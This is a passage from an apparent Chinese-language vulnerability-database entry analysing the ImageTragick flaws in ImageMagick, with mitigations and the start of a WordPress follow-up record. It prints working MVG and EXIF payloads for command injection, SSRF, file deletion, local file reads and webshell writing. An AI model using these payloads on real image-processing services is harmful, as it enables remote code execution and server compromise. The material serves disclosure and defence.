<delegate decode=\"hpgl\" command=\"if [ -e hp2xx -o -e /usr/bin/hp2xx ]; then hp2xx -q -m eps -f `basename "%o"` "%i"; mv -f `basename "%o"` "%o"; else echo "You need to install hp2xx to use HPGL files with ImageMagick."; exit 1; fi\"/>\r\n <delegate decode=\"htm\" command=\""html2ps" -U -o "%o" "%i"\"/>\r\n <delegate decode=\"html\" command=\""html2ps" -U -o "%o" "%i"\"/>\r\n <delegate decode=\"https\" command=\""curl" -s -k -o "%o" "https:%M"\"/>\r\n <delegate decode=\"ilbm\" command=\""ilbmtoppm" "%i" > "%o"\"/>\r\n <delegate decode=\"man\" command=\""groff" -man -Tps "%i" > "%o"\"/>\r\n <delegate decode=\"mpeg:decode\" command=\""ffmpeg" -v -1 -i "%i" -vframes %S -vcodec pam -an -f rawvideo -y "%u.pam" 2> "%Z"\"/>\r\n <delegate encode=\"mpeg:encode\" stealth=\"True\" command=\""ffmpeg" -v -1 -mbd rd -trellis 2 -cmp 2 -subcmp 2 -g 300 -i "%M%%d.jpg" "%u.%m" 2> "%Z"\"/>\r\n <delegate decode=\"sid\" command=\""mrsidgeodecode" -if sid -i "%i" -of tif -o "%o" > "%u"\"/>\r\n <delegate decode=\"pcl:color\" stealth=\"True\" command=\""pcl6" -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=ppmraw" -dTextAlphaBits=%u -dGraphicsAlphaBits=%u "-r%s" %s "-sOutputFile=%s" "%s"\"/>\r\n <delegate decode=\"pcl:cmyk\" stealth=\"True\" command=\""pcl6" -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pamcmyk32" -dTextAlphaBits=%u -dGraphicsAlphaBits=%u "-r%s" %s "-sOutputFile=%s" "%s"\"/>\r\n <delegate decode=\"pcl:mono\" stealth=\"True\" command=\""pcl6" -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pbmraw" -dTextAlphaBits=%u -dGraphicsAlphaBits=%u "-r%s" %s "-sOutputFile=%s" "%s"\"/>\r\n <delegate decode=\"pdf\" encode=\"eps\" mode=\"bi\" command=\""gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=epswrite" "-sOutputFile=%o" 
"-f%i"\"/>\r\n <delegate decode=\"pdf\" encode=\"ps\" mode=\"bi\" command=\""gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=nodevice" "-sOutputFile=%o" "-f%i"\"/>\r\n <delegate decode=\"tiff\" encode=\"launch\" mode=\"encode\" command=\""gimp" "%i"\"/>\r\n <delegate decode=\"pnm\" encode=\"ilbm\" mode=\"encode\" command=\""ppmtoilbm" -24if "%i" > "%o"\"/>\r\n <delegate decode=\"pov\" command=\""povray" "+i%i" -D0 "+o%o" +fn%q +w%w +h%h +a -q9 "-kfi%s" "-kff%n";"convert" -concatenate "%o*.png" "%o"\"/>\r\n <delegate decode=\"ps\" encode=\"eps\" mode=\"bi\" command=\""gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=epswrite" "-sOutputFile=%o" "-f%i"\"/>\r\n <delegate decode=\"ps\" encode=\"pdf\" mode=\"bi\" command=\""gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pdfwrite" "-sOutputFile=%o" "-f%i"\"/>\r\n <delegate decode=\"ps\" encode=\"print\" mode=\"encode\" command=\"lpr "%i"\"/>\r\n <delegate decode=\"ps:alpha\" stealth=\"True\" command=\""gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pngalpha" -dTextAlphaBits=%u -dGraphicsAlphaBits=%u "-r%s" %s "-sOutputFile=%s" "-f%s" "-f%s"\"/>\r\n <delegate decode=\"ps:cmyk\" stealth=\"True\" command=\""gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pam" -dTextAlphaBits=%u -dGraphicsAlphaBits=%u "-r%s" %s "-sOutputFile=%s" "-f%s" "-f%s"\"/>\r\n <delegate decode=\"ps:color\" stealth=\"True\" command=\""gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pnmraw" -dTextAlphaBits=%u -dGraphicsAlphaBits=%u "-r%s" %s "-sOutputFile=%s" "-f%s" "-f%s"\"/>\r\n <delegate decode=\"ps:mono\" stealth=\"True\" command=\""gs" -q -dQUIET 
-dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pbmraw" -dTextAlphaBits=%u -dGraphicsAlphaBits=%u "-r%s" %s "-sOutputFile=%s" "-f%s" "-f%s"\"/>\r\n <delegate decode=\"rgba\" encode=\"rle\" mode=\"encode\" command=\""rawtorle" -o "%o" -v "%i"\"/>\r\n <delegate decode=\"scan\" command=\""scanimage" -d "%i" > "%o"\"/>\r\n <delegate decode=\"scanx\" command=\""scanimage" > "%o"\"/>\r\n <delegate decode=\"miff\" encode=\"show\" spawn=\"True\" command=\""/usr/bin/display" -delay 0 -window-group %[group] -title "%l " "ephemeral:%i"\"/>\r\n <delegate decode=\"shtml\" command=\""html2ps" -U -o "%o" "%i"\"/>\r\n <delegate decode=\"svg\" command=\""rsvg-convert" -o "%o" "%i"\"/>\r\n <delegate decode=\"txt\" encode=\"ps\" mode=\"bi\" command=\""enscript" -o "%o" "%i"\"/>\r\n <delegate decode=\"miff\" encode=\"win\" stealth=\"True\" spawn=\"True\" command=\""/usr/bin/display" -immutable -delay 0 -window-group %[group] -title "%l " "ephemeral:%i"\"/>\r\n <delegate decode=\"wmf\" command=\""wmf2eps" -o "%o" "%i"\"/>\r\n <delegate decode=\"xps:color\" stealth=\"True\" command=\""gxps" -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=ppmraw" -dTextAlphaBits=%u -dGraphicsAlphaBits=%u "-r%s" %s "-sOutputFile=%s" "%s"\"/>\r\n <delegate decode=\"xps:cmyk\" stealth=\"True\" command=\""gxps" -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=bmpsep8" -dTextAlphaBits=%u -dGraphicsAlphaBits=%u "-r%s" %s "-sOutputFile=%s" "%s"\"/>\r\n <delegate decode=\"xps:mono\" stealth=\"True\" command=\""gxps" -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pbmraw" -dTextAlphaBits=%u -dGraphicsAlphaBits=%u "-r%s" %s "-sOutputFile=%s" 
"%s"\"/>\r\n</delegatemap>\r\n```\r\n\r\n\u6211\u4eec\u53ef\u4ee5\u770b\u5230\uff0c\u8fd9\u91cc\u5b83\u5b9a\u4e49\u4e86\u5f88\u591a\u5360\u4f4d\u7b26\uff0c\u6bd4\u5982%i\u662f\u8f93\u5165\u7684\u6587\u4ef6\u540d\uff0c%l\u662f\u56fe\u7247exif label\u4fe1\u606f\u3002\u800c\u5728\u540e\u9762command\u7684\u4f4d\u7f6e\uff0c%i\u548c%l\u7b49\u5360\u4f4d\u7b26\u88ab\u62fc\u63a5\u5728\u547d\u4ee4\u884c\u4e2d\u3002\u8fd9\u4e2a\u6f0f\u6d1e\u4e5f\u56e0\u6b64\u800c\u6765\uff0c\u88ab\u62fc\u63a5\u5b8c\u6bd5\u7684\u547d\u4ee4\u884c\u4f20\u5165\u4e86\u7cfb\u7edf\u7684system\u51fd\u6570\uff0c\u800c\u6211\u4eec\u53ea\u9700\u4f7f\u7528\u53cd\u5f15\u53f7\uff08`\uff09\u6216\u95ed\u5408\u53cc\u5f15\u53f7\uff0c\u6765\u6267\u884c\u4efb\u610f\u547d\u4ee4\u3002\r\n\r\n\u6f0f\u6d1e\u62a5\u544a\u4e2d\u7ed9\u51fa\u7684POC\u662f\u5229\u7528\u4e86\u5982\u4e0b\u7684\u8fd9\u4e2a\u59d4\u6258\uff1a\r\n\r\n```\r\n<delegate decode=\"https\" command=\""curl" -s -k -o "%o" "https:%M"\"/>\r\n```\r\n\r\n\u5b83\u5728\u89e3\u6790https\u56fe\u7247\u7684\u65f6\u5019\uff0c\u4f7f\u7528\u4e86curl\u547d\u4ee4\u5c06\u5176\u4e0b\u8f7d\uff0c\u6211\u4eec\u770b\u5230%M\u88ab\u76f4\u63a5\u653e\u5728curl\u7684\u6700\u540e\u4e00\u4e2a\u53c2\u6570\u5185\u3002ImageMagick\u9ed8\u8ba4\u652f\u6301\u4e00\u79cd\u56fe\u7247\u683c\u5f0f\uff0c\u53ebmvg\uff0c\u800cmvg\u4e0esvg\u683c\u5f0f\u7c7b\u4f3c\uff0c\u5176\u4e2d\u662f\u4ee5\u6587\u672c\u5f62\u5f0f\u5199\u5165\u77e2\u91cf\u56fe\u7684\u5185\u5bb9\uff0c\u800c\u8fd9\u5176\u4e2d\u5c31\u53ef\u4ee5\u5305\u542bhttps\u5904\u7406\u8fc7\u7a0b\u3002\r\n\r\n\u6240\u4ee5\u6211\u4eec\u53ef\u4ee5\u6784\u9020\u4e00\u4e2a.mvg\u683c\u5f0f\u7684\u56fe\u7247\uff08\u4f46\u6587\u4ef6\u540d\u53ef\u4ee5\u4e0d\u4e3a.mvg\uff0c\u6bd4\u5982\u4e0b\u56fe\u4e2d\u5305\u542bpayload\u7684\u6587\u4ef6\u7684\u6587\u4ef6\u540d\u4e3avul.gif\uff0c\u800cImageMagick\u4f1a\u6839\u636e\u5176\u5185\u5bb9\u8bc6\u522b\u4e3amvg\u56fe\u7247\uff09\uff0c\u5e76\u5728`https://`\u540e\u9762\u95ed\u5408\u53cc\u5f15\u53f7\uff0c\u51
99\u5165\u81ea\u5df1\u8981\u6267\u884c\u7684\u547d\u4ee4\uff1a\r\n```\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nfill 'url(https://\"|id; \")'\r\npop graphic-context\r\n```\r\n\u8fd9\u6837\uff0cImageMagick\u5728\u6b63\u5e38\u6267\u884c\u56fe\u7247\u8f6c\u6362\u3001\u5904\u7406\u7684\u65f6\u5019\u5c31\u4f1a\u89e6\u53d1\u6f0f\u6d1e\uff1a\r\n\r\n\r\n\r\n\u5176\u4ed6\u51e0\u4e2aCVE\u4e5f\u6bd4\u8f83\u6709\u8da3\uff0c\u6bd4\u5982CVE-2016-3718\uff0c\u4ed6\u662f\u5229\u7528mvg\u683c\u5f0f\u4e2d\u53ef\u4ee5\u5305\u542burl\u7684\u7279\u70b9\uff0c\u8fdb\u884cSSRF\u653b\u51fb\uff0cPOC\u5982\u4e0b\uff1a\r\n\r\n```\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nfill 'url(http://example.com/)'\r\npop graphic-context\r\n```\r\n\r\nCVE-2016-3715\u662f\u5229\u7528ImageMagick\u652f\u6301\u7684ephemeral\u534f\u8bae\uff0c\u6765\u5220\u9664\u4efb\u610f\u6587\u4ef6\uff1a\r\n```\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nimage over 0,0 0,0 'ephemeral:/tmp/delete.txt'\r\npopgraphic-context\r\n```\r\n\r\nCVE-2016-3716\u662f\u5229\u7528ImageMagick\u652f\u6301\u7684msl\u534f\u8bae\uff0c\u6765\u8fdb\u884c\u6587\u4ef6\u7684\u8bfb\u53d6\u548c\u5199\u5165\u3002\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\uff0c\u53ef\u4ee5\u5c06\u4efb\u610f\u6587\u4ef6\u5199\u4e3a\u4efb\u610f\u6587\u4ef6\uff0c\u6bd4\u5982\u5c06\u56fe\u7247\u5199\u4e3a\u4e00\u4e2a.php\u540e\u7f00\u7684webshell\u3002\r\n\r\n\u7279\u522b\u8bf4\u660e\u7684\u662f\uff0cmsl\u534f\u8bae\u662f\u8bfb\u53d6\u4e00\u4e2amsl\u683c\u5f0f\u7684xml\u6587\u4ef6\uff0c\u5e76\u6839\u636e\u5176\u5185\u5bb9\u6267\u884c\u4e00\u4e9b\u64cd\u4f5c\uff1a\r\n\r\n```\r\nfile_move.mvg\r\n-=-=-=-=-=-=-=-=-\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nimage over 0,0 0,0 'msl:/tmp/msl.txt'\r\npopgraphic-context\r\n\r\n/tmp/msl.txt\r\n-=-=-=-=-=-=-=-=-\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<image>\r\n<read filename=\"/tmp/image.gif\" />\r\n<write filename=\"/var/www/shell.php\" 
/>\r\n</image>\r\n```\r\n\r\nCVE-2016-3717\u53ef\u4ee5\u9020\u6210\u672c\u5730\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e\uff1a\r\n\r\n```\r\npush graphic-context\r\nviewbox 0 0 640 480\r\nimage over 0,0 0,0 'label:@/etc/hosts'\r\npop graphic-context\r\n```\r\n\r\n### 0x02 \u6df1\u5165\u5206\u6790\r\n\u9664\u4e86\u62a5\u544a\u4e2d\u7ed9\u51fa\u7684POC\u4ee5\u5916\uff0c\u5404\u4e2a\u5b89\u5168\u7814\u7a76\u4eba\u5458\u4e5f\u96c6\u601d\u5e7f\u76ca\uff0c\u53d1\u73b0\u8fd9\u4e2a\u6d1e\u7684\u66f4\u591a\u5229\u7528/\u5f71\u54cd\u65b9\u5f0f\u3002\r\n\r\n\u9996\u5148\uff0cPHP\u6269\u5c55\u300eImageMagick\u300f\u4e5f\u5b58\u5728\u8fd9\u4e2a\u95ee\u9898\uff0c\u800c\u4e14\u53ea\u9700\u8981\u8c03\u7528\u4e86Imagick\u7c7b\u7684\u6784\u9020\u65b9\u6cd5\uff0c\u5373\u53ef\u89e6\u53d1\u8fd9\u4e2a\u6f0f\u6d1e\uff1a\r\n\r\n```\r\n<?php\r\nnew Imagick('vul.gif');\r\n\r\n```\r\n\u56e0\u4e3a\u6ca1\u6709\u8fd4\u56de\u503c\uff0c\u6211\u5229\u7528cloudeye\u6355\u6349\u5230apache\u65e5\u5fd7\uff0c\u4ece\u65e5\u5fd7\u4e2d\u8bfb\u53d6\u547d\u4ee4\u6267\u884c\u7684\u7ed3\u679c\uff1a\r\n\r\n\r\n\r\n\u53e6\u5916\uff0c\u7ecf\u8fc7\u5206\u6790\uff0c\u7814\u7a76\u4eba\u5458\u53d1\u73b0\u9664\u4e86.mvg\u683c\u5f0f\u7684\u56fe\u7247\u4ee5\u5916\uff0c\u666e\u901apng\u683c\u5f0f\u7684\u56fe\u7247\u4e5f\u80fd\u89e6\u53d1\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\u3002\u6211\u4eec\u770b\u5230\u524d\u9762\u59d4\u6258\u4e2d\u5bf9%l\uff0c\u4e5f\u5c31\u662fexif label\u7684\u5904\u7406\uff1a\r\n```\r\n<delegate decode=\"miff\" encode=\"show\" spawn=\"True\" command=\""/usr/bin/display" -delay 0 -window-group %[group] -title "%l " 
"ephemeral:%i"\"/>\r\n```\r\n\u5b83\u5c06%l\u62fc\u63a5\u8fdb\u5165\u4e86/usr/bin/display\u547d\u4ee4\u4e2d\uff0c\u6240\u4ee5\u6211\u53ea\u9700\u5c06\u6b63\u5e38\u7684png\u56fe\u7247\uff0c\u5e26\u4e0a\u4e00\u4e2a\u300e\u6076\u610f\u300f\u7684exif\u4fe1\u606f\u3002\u5728\u8c03\u7528ImageMagick\u5c06\u5176\u5904\u7406\u6210.show\u6587\u4ef6\u7684\u65f6\u5019\uff0c\u5373\u53ef\u89e6\u53d1\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\uff1a\r\n\r\n```\r\nexiftool -label=\"\\\"|/usr/bin/id; \\\"\" test.png\r\nconvert test.png o.show\r\n```\r\n\r\n\r\n\u4f46\u8fd9\u4e2a\u65b9\u6cd5\u9e21\u808b\u4e4b\u5904\u5728\u4e8e\uff0c\u56e0\u4e3adelegate.xml\u4e2d\u914d\u7f6e\u7684encode=\"show\"\uff08\u6216\"win\"\uff09\uff0c\u6240\u4ee5\u53ea\u6709\u8f93\u51fa\u4e3a.show\u6216.win\u683c\u5f0f\u7684\u60c5\u51b5\u4e0b\u624d\u4f1a\u8c03\u7528\u8fd9\u4e2a\u59d4\u6258\uff0c\u800c\u666e\u901a\u7684\u6587\u4ef6\u5904\u7406\u662f\u4e0d\u4f1a\u89e6\u53d1\u8fd9\u4e2a\u547d\u4ee4\u7684\u3002\r\n\r\n### 0x03 \u5f71\u54cd\u5206\u6790\r\n\r\nImageMagick\u662f\u4e00\u4e2a\u4f7f\u7528\u975e\u5e38\u5e7f\u7684\u7ec4\u4ef6\uff0c\u5927\u91cf\u5382\u5546\u90fd\u5728\u5904\u7406\u56fe\u7247\u7684\u65f6\u5019\u8c03\u7528\u8fd9\u4e2a\u7a0b\u5e8f\u8fdb\u884c\u5904\u7406\uff0c\u800c\u4e14\u5f88\u591a\u5f00\u6e90\u5e94\u7528\u4e5f\u5728\u6838\u5fc3\u4ee3\u7801\u4e2d\u5305\u542b\u4e86ImageMagick\u9009\u9879\u3002\r\n\r\nWordpress\u662f\u8457\u540d\u7684\u4e2a\u4eba\u535a\u5ba2/CMS\u5382\u5546\uff0c\u5176\u6838\u5fc3\u6e90\u7801\u4e2d\u4f7f\u7528\u4e86PHP\u6269\u5c55ImageMagick\u3002\u53d7\u5230\u8fd9\u4e2a\u6f0f\u6d1e\u7684\u5f71\u54cd\uff0c\u5728\u653b\u51fb\u8005\u62e5\u6709\u4e00\u5b9a\u6743\u9650\u7684\u60c5\u51b5\u4e0b\uff0c\u53ef\u4ee5\u5728Wordpress\u4e2d\u89e6\u53d1\u4efb\u610f\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff1a [WooYun: 
Wordpress\u67d0\u6838\u5fc3\u529f\u80fd\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff08\u4e00\u5b9a\u6743\u9650\uff09](http://www.wooyun.org/bugs/wooyun-2016-0205047)\r\n\r\n\u540c\u6837\u7684\uff0cDiscuz\u3001Drupal\u7b49\u5e38\u7528CMS\u4e2d\u4e5f\u8c03\u7528\u4e86ImageMagick\u6269\u5c55\u6216ImageMagick\u5e93\uff0cCVE-2016-3714\u4e5f\u53ef\u80fd\u4f1a\u5f71\u54cd\u5230\u4ed6\u4eec\u3002\r\n\r\n\u4f46\u6839\u636e\u6211\u5bf9Discuz\u7684\u5206\u6790\uff0c\u5176\u8c03\u7528ImageMagick\u5904\u7406\u56fe\u7247\u4e4b\u524d\uff0c\u4f1a\u5148\u4f7f\u7528php\u7684getimagesize\u8fdb\u884c\u56fe\u7247\u683c\u5f0f\u3001\u5927\u5c0f\u7684\u9a8c\u8bc1\uff0c\u6240\u4ee5\u672c\u6587\u4e2d\u6240\u6d89\u53ca\u7684POC\u65e0\u6cd5\u5728Disucz\u4e2d\u76f4\u63a5\u4f7f\u7528\uff0c\u4f46\u4e0d\u6392\u9664\u6709\u5176\u4ed6\u65b9\u6cd5\u7ed5\u8fc7discuz\u5bf9\u8be5\u95ee\u9898\u7684\u9650\u5236\u3002\r\n\r\n\u9664\u4e86\u5f00\u6e90\u8f6f\u4ef6\u4e2d\u7684\u6f0f\u6d1e\u4ee5\u5916\uff0c\u56fd\u5185\u5916\u5404\u5927\u5382\u5546\u6216\u591a\u6216\u5c11\u90fd\u6536\u5230\u4e86\u8be5\u95ee\u9898\u7684\u5f71\u54cd\uff0c\u5f71\u54cd\u6700\u5927\u7684\u5e94\u8be5\u5c5e\u4eba\u4eba\uff0c\u4eba\u4eba\u67d0\u5904\u4e0a\u4f20\u4f4d\u7f6e\u8c03\u7528\u4e86ImageMagick\u8fdb\u884c\u56fe\u7247\u7684\u5904\u7406\uff0c\u7ed3\u679c\u9020\u6210\u4e86\u547d\u4ee4\u6267\u884c\uff0c\u5bfc\u81f4\u5185\u7f51\u88ab\u767d\u5e3d\u5b50\u653b\u7834\uff1a [WooYun: 
\u4eba\u4eba\u7f51\u67d0\u6f0f\u6d1e\u5bfc\u81f4\u76f4\u63a5Getshell\u5f71\u54cd\u4e3b\u5e72\u7f51\u7edc\u76f4\u5165\u5185\u7f51](http://www.wooyun.org/bugs/wooyun-2016-0205171)\r\n\r\n\u53e6\u5916\uff0c\u767e\u5ea6\u3001\u4f18\u9177\u3001\u817e\u8baf\u3001\u4e03\u725b\u7b49\u8bf8\u591a\u5382\u5546\u90fd\u6536\u5230\u8be5\u6f0f\u6d1e\u5f71\u54cd\r\n\r\n\u8fd8\u6709\u4e2a\u6bd4\u8f83\u6709\u610f\u601d\u7684\u5730\u65b9\uff0c\u56e0\u4e3a\u65b0\u6d6asae\u7684php\u5305\u542bImageMagick\u6269\u5c55\uff0c\u6240\u4ee5\u4e4c\u4e91\u4e0a\u6709\u767d\u5e3d\u5b50\u5229\u7528\u8fd9\u4e2a\u6f0f\u6d1e\uff0c\u6210\u529f\u7ed5\u8fc7\u4e86sae\u7684\u6c99\u76d2 [WooYun: SAE \u6c99\u76d2\u7ed5\u8fc7\uff08ImageMagick CVE20163714 \u5e94\u7528\u5b9e\u4f8b\uff09](http://www.wooyun.org/bugs/wooyun-2016-0205051)\r\n\r\n### 0x04 \u6f0f\u6d1e\u4fee\u590d\r\n\u5173\u4e8e\u8fd9\u4e2a\u6f0f\u6d1e\u5f71\u54cdImageMagick 6.9.3-9\u4ee5\u524d\u662f\u6240\u6709\u7248\u672c\uff0c\u5305\u62ecubuntu\u6e90\u4e2d\u5b89\u88c5\u7684ImageMagick\u3002\u800c\u5b98\u65b9\u57286.9.3-9\u7248\u672c\u4e2d\u5bf9\u6f0f\u6d1e\u8fdb\u884c\u4e86\u4e0d\u5b8c\u5168\u7684\u4fee\u590d\u3002\u6240\u4ee5\uff0c\u6211\u4eec\u4e0d\u80fd\u4ec5\u901a\u8fc7\u66f4\u65b0ImageMagick\u7684\u7248\u672c\u6765\u675c\u7edd\u8fd9\u4e2a\u6f0f\u6d1e\u3002\r\n\r\n\u73b0\u5728\uff0c\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u5982\u4e0b\u4e24\u4e2a\u65b9\u6cd5\u6765\u6682\u65f6\u89c4\u907f\u6f0f\u6d1e\uff1a\r\n\r\n\u5904\u7406\u56fe\u7247\u524d\uff0c\u5148\u68c0\u67e5\u56fe\u7247\u7684 \"magic 
bytes\"\uff0c\u4e5f\u5c31\u662f\u56fe\u7247\u5934\uff0c\u5982\u679c\u56fe\u7247\u5934\u4e0d\u662f\u4f60\u60f3\u8981\u7684\u683c\u5f0f\uff0c\u90a3\u4e48\u5c31\u4e0d\u8c03\u7528ImageMagick\u5904\u7406\u56fe\u7247\u3002\u5982\u679c\u4f60\u662fphp\u7528\u6237\uff0c\u53ef\u4ee5\u4f7f\u7528getimagesize\u51fd\u6570\u6765\u68c0\u67e5\u56fe\u7247\u683c\u5f0f\uff0c\u800c\u5982\u679c\u4f60\u662fwordpress\u7b49web\u5e94\u7528\u7684\u4f7f\u7528\u8005\uff0c\u53ef\u4ee5\u6682\u65f6\u5378\u8f7dImageMagick\uff0c\u4f7f\u7528php\u81ea\u5e26\u7684gd\u5e93\u6765\u5904\u7406\u56fe\u7247\u3002\r\n\u4f7f\u7528policy file\u6765\u9632\u5fa1\u8fd9\u4e2a\u6f0f\u6d1e\uff0c\u8fd9\u4e2a\u6587\u4ef6\u9ed8\u8ba4\u4f4d\u7f6e\u5728 /etc/ImageMagick/policy.xml \uff0c\u6211\u4eec\u901a\u8fc7\u914d\u7f6e\u5982\u4e0b\u7684xml\u6765\u7981\u6b62\u89e3\u6790https\u7b49\u654f\u611f\u64cd\u4f5c\uff1a\r\n```\r\n<policymap>\r\n <policy domain=\"coder\" rights=\"none\" pattern=\"EPHEMERAL\" />\r\n <policy domain=\"coder\" rights=\"none\" pattern=\"URL\" />\r\n <policy domain=\"coder\" rights=\"none\" pattern=\"HTTPS\" />\r\n <policy domain=\"coder\" rights=\"none\" pattern=\"MVG\" />\r\n <policy domain=\"coder\" rights=\"none\" pattern=\"MSL\" />\r\n</policymap>\r\n```\r\n\r\n### \u76f8\u5173\u94fe\u63a5\r\n\r\n* https://imagetragick.com/\r\n\r\n* http://www.openwall.com/lists/oss-security/2016/05/03/18\r\n\r\n* http://weibo.com/p/1001603971443670055277\r\n\r\n\u611f\u8c22 @redrain\u6709\u8282\u64cd @Ricter @BigBan \r\n\r\n\r\n### PoCs\r\nhttps://github.com/ImageTragick/PoCs", "published": "2016-05-04T00:00:00", "type": "seebug", "title": "ImageMagick \u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\n (ImageTragick)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3714", "CVE-2016-3715", "CVE-2016-3716", "CVE-2016-3717", "CVE-2016-3718"], "modified": "2016-05-04T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-91446", "id": "SSV:91446", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T12:11:48", "description": "\u6765\u6e90 [http://ricterz.me/](http://ricterz.me/posts/Write%20Up%3A%20Remote%20Command%20Execute%20in%20Wordpress%204.5.1?_=1462424557950),\u683c\u5f0f\u7a0d\u4f5c\u6574\u7406\r\n\r\n### ImageMagick\r\n\r\nImageMagick \u6628\u5929\u66dd\u51fa [CVE-2016-3714](https://www.seebug.org/vuldb/ssvid-91446)\uff0cJava\u3001PHP \u7684\u5e93\u4e5f\u53d7\u5176\u5f71\u54cd(\u53ef\u53c2\u8003 https://www.seebug.org/vuldb/ssvid-91446 )\u3002\u5176\u4e2d PHP \u7684\u5e93 Imagick \u5e94\u7528\u5e7f\u6cdb\uff0c\u6ce2\u53ca\u4e5f\u5927\u3002Wordpress \u4e5f\u5c31\u662f\u53d7\u6b64\u6f0f\u6d1e\u5f71\u54cd\u51fa\u73b0\u4e86 RCE\u3002\r\n\r\n\u8fd9\u4e2a\u6f0f\u6d1e\u5f88\u8822\uff0cImageMagick \u5728 MagickCore/constitute.c \u7684 ReadImage \u51fd\u6570\u4e2d\u89e3\u6790\u56fe\u7247\uff0c\u5982\u679c\u56fe\u7247\u5730\u5740\u662f```https://```\u5f00\u5934\u7684\uff0c\u5373\u8c03\u7528 InvokeDelegate\u3002\r\nMagickCore/delegate.c \u5b9a\u4e49\u4e86\u59d4\u6258\uff0c\u7b2c 99 \u884c\u5b9a\u4e49\u4e86\u8981\u6267\u884c\u7684\u547d\u4ee4\u3002\r\n\u6700\u7ec8 InvokeDelegate \u8c03\u7528 ExternalDelegateCommand \u6267\u884c\u547d\u4ee4\u3002\r\n\r\n\r\n\r\nMagickCore/delegate.c\r\n\r\n\r\n\r\n\r\n\r\n\u4e3a\u4e86\u8ba9\u5927\u5bb6\u66f4\u6e05\u695a\u7684\u770b\u89c1\uff1a\r\n\r\n\r\n\u81f3\u6b64\uff0c\u4e00\u4e2a\u547d\u4ee4\u6ce8\u5165\u5c31\u5f62\u6210\u4e86\u3002\r\n\r\n### Wordpress\r\n\r\nWordpress \u5728\u56fe\u50cf\u5904\u7406\u7684\u65f6\u5019\u9ed8\u8ba4\u4f18\u5148\u9009\u62e9 Imagick Library\u3002\r\n\r\nwp-includes/media.php:_wp_image_editor_choose\r\n\r\n\r\n\u5982\u679c\u80fd\u627e\u5230\u4e00\u4e2a\u70b9\uff0c\u8c03\u7528\u4e86 Imagick \u7c7b\u7684\u8bdd\uff0c\u90a3\u4e48\u5c31\u53ef\u4ee5\u8fdb\u884c\u547d\u4ee4\u6267\u884c\u3002\r\nwp-includes/media.php:wp_get_image_editor\r\n\r\n\r\n\u8fd9\u4e2a\u51fd\u6570\u5b9e\u4f8b\u5316\u4e86 
WP_Image_Editor_Imagick \u7c7b\u3002\u5168\u5c40 grep \u4e00\u4e0b wp_get_image_editor \u53ef\u4ee5\u53d1\u73b0\u51e0\u5904\u8c03\u7528\u7684\u5730\u65b9\uff0c\u6bd4\u5982wp_crop_image\u3002\r\nwp-admin/includes/image.php:wp_crop_image\r\n\r\n\r\n\u8fd9\u6837\u5bfb\u627e\u8c03\u7528\u8fd9\u4e2a\u51fd\u6570\u7684\u5730\u65b9\u5c31\u597d\u4e86\u3002\r\n\u50cf\u5446\u5b50\u4e0d\u5f00\u53e3\u90a3\u6837\u6276\u4e86\u6276\u955c\u6846\uff0c\u627e\u5230\u4e00\u4e2a\u3002\u8981\u6c42\u7684\u6700\u5c0f\u6743\u9650\u662f Author\u3002\r\n\u4e0d\u662f Unauthorized \u5c31\u53ef\u4ee5\u5229\u7528\u7684 RCE\uff0c\u771f\u662f\u96be\u8fc7\u554a..\r\n\r\n### PoC\r\n\r\n\u7528 Author 